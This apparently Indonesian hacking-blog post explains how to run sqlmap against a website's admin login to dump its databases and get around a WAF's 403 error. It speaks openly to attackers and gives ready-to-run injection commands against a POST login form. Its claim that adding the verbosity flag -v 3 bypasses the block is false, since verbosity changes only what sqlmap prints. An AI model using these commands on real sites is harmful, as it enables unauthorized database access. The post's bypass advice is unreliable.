SQLMap Bypass Error 403 (Not Acceptable)

Terinspirasi dari masalah yang dialami oleh seseorang teman saya ketika melakukan sql injection terkendala oleh 403 (Not Acceptable) dimana dalam SQL Injection terkadang ada beberapa query atau sintak yang dibatasi penggunaanya atau jusru adanya waf yang sangad kerad. Hal ini tentu saja menyusahkan para attacker dalam melakukan aksinya karna 403 (Not Acceptable) menyebabkan gagalnya proses sql injection. Pada kali ini saya akan membahas cara bypass sqlmap error 403 (Not Acceptable). Oke langsung saja kita praktek

Basic Command Sqlmap:

sqlmap.py -u site.com/admin/login --data=”username=a%27&password=a%27&redirect=&submitted=submitted” -p “username” --level 5 --dbs --random-agent

Output:

[20:44:30] [WARNING] heuristic (basic) test shows that POST parameter ‘username’ might not be injectable

Bypass Command:

sqlmap.py -u site.com/admin/login --data=”username=a%27&password=a%27&redirect=&submitted=submitted” -p “username” --level 5 --dbs --random-agent -v 3

Output:

Dengan menambahkan verbose kita dapat membypass Error 403 (Not Acceptable). Untuk kasus lain kalian juga bisa mencoba cara ini. sesuaikan juga --level --risk untuk menambah tingkat keberhasilan saat melakukan SQLinjection

Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.

Terimakasih dan semoga bermanfaat :)
Thx To: Rexha - Sorong666etar